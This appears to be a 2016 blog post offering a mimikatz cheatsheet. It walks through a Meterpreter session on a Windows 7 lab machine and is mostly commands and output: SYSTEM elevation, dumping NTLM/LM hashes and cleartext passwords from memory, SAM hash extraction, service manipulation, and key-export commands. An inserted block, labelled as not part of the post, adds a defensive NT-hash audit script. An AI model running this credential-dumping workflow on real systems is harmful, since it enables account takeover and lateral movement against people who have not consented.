04 Sep 2016, 21:31

mimikatz cheatsheet

Let’s talk about mimikatz. I’ve had the pleasure of using this tool in a few penetration tests, and it has been VERY useful. Mimikatz was designed with a focus on extracting LM and NTLM hashes, with the added benefit of showing the cleartext passwords sitting in memory, plus a number of other functions.

I have created a demo on a Win7 x86 box to show you how it works. The username is dev and the password is password.

Our demo makes use of a Metasploit installation in a Docker container (thanks remnux) where the multi/handler is running.

Let’s begin.

Getting a shell has already been taken care of for us with psexec.

msf exploit(handler) > 
[*] Sending stage (957999 bytes) to 10.0.0.114
[*] Meterpreter session 1 opened (172.17.0.2:2222 -> 10.0.0.114:49417) at 2016-09-04 19:20:27 +0000

msf exploit(handler) >

Done, now we have a session to play with. Let’s make sure we have only one session.

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x86/win32  dev-PC\dev @ DEV-PC  172.17.0.2:2222 -> 10.0.0.114:49417 (10.0.0.114)

msf exploit(handler) >

Now we jump into that session, as shown below.

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

The most important thing about mimikatz is the ability to extract the passwords in any form you like; however, this can only be done when meterpreter is running as SYSTEM. In the example below you will see that we are running as dev, the user who was logged onto the system. This will not do.

meterpreter > getuid
Server username: dev-PC\dev
meterpreter > 

As I mentioned above, we need to be SYSTEM in order to do what this demo sets out to show. So let’s execute a native meterpreter command to elevate the meterpreter session from the user account to SYSTEM. After getting system you can run getuid again to make sure we now have the SYSTEM account.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Now that we have the most important step completed, we can go ahead and do some recon on the system for fun before we grab all the creds.

meterpreter > sysinfo
Computer        : DEV-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

From here we can load mimikatz which will be the module of focus in this post.

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

After loading mimikatz, we pull up its help to make sure the extension is listening to us.

meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

meterpreter >

If you wanted to check the version of mimikatz for some reason, you can do that with mimikatz_command.

meterpreter > mimikatz_command -f version
mimikatz 1.0 x86 (RC) (Jul 11 2016 21:35:47)
meterpreter >

Reading hashes and passwords from memory can be done in two ways.

You can use either the built-in meterpreter commands (msv, kerberos and friends) or custom mimikatz commands passed through mimikatz_command to extract credentials from memory. Let’s look at the built-in native method first.

Let’s dump the NTLM/LM hashes using the built-in meterpreter method.

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;103437  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;103396  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     DEV-PC$        n.s. (Credentials KO)
0;22584   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     DEV-PC$        n.s. (Credentials KO)

meterpreter >

Now we use the built-in kerberos command to extract cleartext passwords from memory. You will see that the password for user dev is password, as I explained at the beginning.

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     DEV-PC$        
0;22584   NTLM                                    
0;999     NTLM       WORKGROUP     DEV-PC$        
0;103437  NTLM       dev-PC        dev            password
0;103396  NTLM       dev-PC        dev            password

meterpreter >

Now let’s look at the mimikatz crafted commands to do the same thing.

Let’s dump the hashes with mimikatz_command -f samdump::hashes.

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : dev-PC
BootKey    : d20b4e2698ac8389dd909b1b389ab826

Rid  : 500
User : Administrator
LM   : 
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   : 
NTLM : 

Rid  : 1001
User : dev
LM   : 
NTLM : 8846f7eaee8fb117ad06bdd830b7586c

Rid  : 1002
User : HomeGroupUser$
LM   : 
NTLM : 022fff2ba68fb20d5a32145c43912fa0
meterpreter > 
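An added example, not part of the original post, showing why these dumps are so damaging: the NT hash is an unsalted MD4 over the UTF-16LE password, so the 8846f7... value above is the well-known hash of "password" and Administrator’s 31d6cf... value is the hash of an empty string. The audit_samdump helper and the SAMPLE text are constructed here (they are not mimikatz code) to flag such accounts in samdump::hashes output during a review.

```python
import struct

MASK = 0xFFFFFFFF
# RFC 1320 rounds: (boolean function, word order, shift amounts, additive constant)
_ROUNDS = (
    (lambda x, y, z: (x & y) | (~x & z), range(16), (3, 7, 11, 19), 0),
    (lambda x, y, z: (x & y) | (x & z) | (y & z),
     (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
    (lambda x, y, z: x ^ y ^ z,
     (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
)

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (hashlib's md4 is often disabled under OpenSSL 3)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # Pad to 56 bytes mod 64, then append the message bit length as a little-endian u64.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for f, order, shifts, k in _ROUNDS:
            for i, idx in enumerate(order):
                t, s = (A + f(B, C, D) + X[idx] + k) & MASK, shifts[i % 4]
                A, B, C, D = D, ((t << s) | (t >> (32 - s))) & MASK, B, C
        a, b, c, d = (a + A) & MASK, (b + B) & MASK, (c + C) & MASK, (d + D) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); no salt, so one password gives one hash everywhere."""
    return md4(password.encode("utf-16-le")).hex()

# Hashes a responder should recognise on sight: the blank password plus a few trivial ones.
KNOWN_WEAK = {nt_hash(""): "<empty password>", **{nt_hash(p): p for p in ("password", "Password1", "123456")}}

def audit_samdump(text: str) -> dict:
    """Walk 'User :' / 'NTLM :' lines in samdump::hashes layout; return {account: why it is weak}."""
    findings, user = {}, None
    for line in text.splitlines():
        key, _, val = (part.strip() for part in line.partition(":"))
        if key == "User":
            user = val
        elif key == "NTLM" and user and val.lower() in KNOWN_WEAK:
            findings[user] = KNOWN_WEAK[val.lower()]
    return findings

# Constructed sample: three account blocks copied from the samdump::hashes output above.
SAMPLE = ("Rid  : 500\nUser : Administrator\nNTLM : 31d6cfe0d16ae931b73c59d7e0c089c0\n"
          "Rid  : 1001\nUser : dev\nNTLM : 8846f7eaee8fb117ad06bdd830b7586c\n"
          "Rid  : 1002\nUser : HomeGroupUser$\nNTLM : 022fff2ba68fb20d5a32145c43912fa0\n")
```

Running audit_samdump(SAMPLE) flags Administrator (empty password) and dev ("password") while HomeGroupUser$ passes, which is the kind of triage worth doing on any SAM dump recovered during an incident.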

And naturally we can extract the passwords held in memory too, using mimikatz_command -f sekurlsa::searchPasswords. Here again we can see that user dev’s password is password.

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { dev ; dev-PC ; password }
[1] { dev ; dev-PC ; password }
[2] { dev-PC ; dev ; password }
[3] { dev-PC ; dev ; password }
[4] { dev ; dev-PC ; password }
[5] { dev ; dev-PC ; password }
meterpreter >

Another useful command in the mimikatz bag is the service module. Using it you can list, start, stop and remove Windows services.

meterpreter > mimikatz_command -f service::
Module : 'service' identifié, mais commande '' introuvable

Description du module : Manipulation des services
        list	- Liste les services et pilotes
       start	- Démarre un service ou pilote
        stop	- Arrête un service ou pilote
      remove	- Supprime un service ou pilote
    mimikatz	- Installe et/ou démarre le pilote mimikatz
meterpreter > 

meterpreter > mimikatz_command -f service::list
	KERNEL_DRIVER	STOPPED	1394ohci	1394 OHCI Compliant Host Controller
	KERNEL_DRIVER	RUNNING	ACPI	Microsoft ACPI Driver
	KERNEL_DRIVER	STOPPED	AcpiPmi	ACPI Power Meter Driver
 3568	WIN32_OWN_PROCESS	RUNNING	AdobeARMservice	Adobe Acrobat Update Service
	KERNEL_DRIVER	STOPPED	adp94xx	adp94xx
	KERNEL_DRIVER	STOPPED	adpahci	adpahci
	KERNEL_DRIVER	STOPPED	adpu320	adpu320
	WIN32_SHARE_PROCESS	STOPPED	AeLookupSvc	Application Experience
	KERNEL_DRIVER	RUNNING	AFD	Ancillary Function Driver for Winsock
	KERNEL_DRIVER	STOPPED	agp440	Intel AGP Bus Filter
	KERNEL_DRIVER	STOPPED	aic78xx	aic78xx
	WIN32_OWN_PROCESS	STOPPED	ALG	Application Layer Gateway Service
	KERNEL_DRIVER	STOPPED	aliide	aliide
	KERNEL_DRIVER	STOPPED	amdagp	AMD AGP Bus Filter Driver
	KERNEL_DRIVER	STOPPED	amdide	amdide
	KERNEL_DRIVER	STOPPED	AmdK8	AMD K8 Processor Driver
	KERNEL_DRIVER	STOPPED	AmdPPM	AMD Processor Driver
	KERNEL_DRIVER	STOPPED	amdsata	amdsata
	KERNEL_DRIVER	STOPPED	amdsbs	amdsbs
	KERNEL_DRIVER	RUNNING	amdxata	amdxata
	KERNEL_DRIVER	STOPPED	AppID	AppID Driver
	WIN32_SHARE_PROCESS	STOPPED	AppIDSvc	Application Identity
 1284	WIN32_SHARE_PROCESS	RUNNING	Appinfo	Application Information
	WIN32_SHARE_PROCESS	STOPPED	AppMgmt	Application Management
	KERNEL_DRIVER	STOPPED	arc	arc
	KERNEL_DRIVER	STOPPED	arcsas	arcsas
	KERNEL_DRIVER	STOPPED	AsyncMac	RAS Asynchronous Media Driver
	KERNEL_DRIVER	RUNNING	atapi	IDE Channel
 1256	WIN32_SHARE_PROCESS	RUNNING	AudioEndpointBuilder	Windows Audio Endpoint Builder
 1224	WIN32_SHARE_PROCESS	RUNNING	Audiosrv	Windows Audio
	WIN32_SHARE_PROCESS	STOPPED	AxInstSV	ActiveX Installer (AxInstSV)
	KERNEL_DRIVER	STOPPED	b06bdrv	Broadcom NetXtreme II VBD
<snip>
meterpreter >

You might think that having the ability to play with services would give you a little more power, and you are 100% correct. With mimikatz you can also extract certificates (amongst other things) using the crypto module. See below.

meterpreter > mimikatz_command -f crypto::
Module : 'crypto' identifié, mais commande '' introuvable

Description du module : Cryptographie et certificats
listProviders	- Liste les providers installés)
  listStores	- Liste les magasins système
listCertificates	- Liste les certificats
    listKeys	- Liste les conteneurs de clés
exportCertificates	- Exporte les certificats
  exportKeys	- Exporte les clés
    patchcng	- [experimental] Patch le gestionnaire de clés pour l'export de clés non exportable
   patchcapi	- [experimental] Patch la CryptoAPI courante pour l'export de clés non exportable
meterpreter > 

meterpreter > mimikatz_command -f crypto::listProviders
Providers CryptoAPI :
	Microsoft Base Cryptographic Provider v1.0
	Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Base DSS Cryptographic Provider
	Microsoft Base Smart Card Crypto Provider
	Microsoft DH SChannel Cryptographic Provider
	Microsoft Enhanced Cryptographic Provider v1.0
	Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Enhanced RSA and AES Cryptographic Provider
	Microsoft RSA SChannel Cryptographic Provider
	Microsoft Strong Cryptographic Provider

Providers CNG :
	Microsoft Primitive Provider
	Microsoft Smart Card Key Storage Provider
	Microsoft Software Key Storage Provider
	Microsoft SSL Protocol Provider
meterpreter >

remember, don’t harm anyone with this knowledge.

stay tuned for more fun.

…the end.